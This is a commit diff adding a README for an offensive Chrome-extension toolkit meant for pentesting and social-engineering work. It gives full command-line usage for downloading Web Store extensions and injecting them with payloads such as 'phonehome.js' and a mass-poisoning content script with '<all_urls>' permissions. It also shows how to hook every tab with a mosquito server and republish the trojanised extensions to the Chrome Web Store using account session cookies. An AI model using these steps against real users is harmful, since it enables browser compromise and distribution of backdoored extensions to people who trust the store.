added new files, readme and contact info

tools/chrome_extensions_exploitation/README.md

@@ -0,0 +1,87 @@
+Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.
+
+Authors:
+ 
+ - Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
+ - Michele '@antisnatchor' Orru
+
+
+Injector
+--------
+Bunch of scripts for injecting existing extensions with new code:
+Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).
+
+Requirements:
+ 
+ - bash
+ - ruby
+ - zip (cmd line)
+ - curl (cmd line)
+ - Google Chrome (used in crx mode only)
+
+Usage:
+
+    # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js
+
+    # Same, but pack into repacked.zip instead
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
+    
+    # Create new CRX with Google Chrome
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js
+
+    # Inject into existing CRX file
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js
+
+    # Add some permissions into manifest.json
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"
+    
+    # Add persistent content script file launching on every tab
+    $ echo 'console.log(location.href)' > cs.js
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
+
+For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):
+
+    # start mosquito server:
+    $ cd path/to/mosquito 
+    $ python mosquito/start.py 8082 4444 --http 8000
+
+    # generate mosquito hook:
+    # - visit http://localhost:8000/generate
+    # - save hook as cs.js
+
+    # inject mosquito dropper into extension:
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
+
+
+Webstore Uploader
+-----------------
+Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store
+
+Requirements: 
+
+ - ruby
+
+Usage:
+
+    # Preparation:
+
+    1. Create Chrome developer account
+    2. Login at https://chrome.google.com/webstore/developer/dashboard/
+    3. Pay your $5 one time fee (credit card needed)
+    4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file
+
+    # Get Chrome extension code
+    #  e.g. run Injector in zip mode:
+
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
+
+    # (optional) - prepare screenshot / description file
+
+    # publish the extension right away
+    $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png
+
+    # or just upload & save it:
+    $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png
+
+    # you can access the extension from your developer dashboard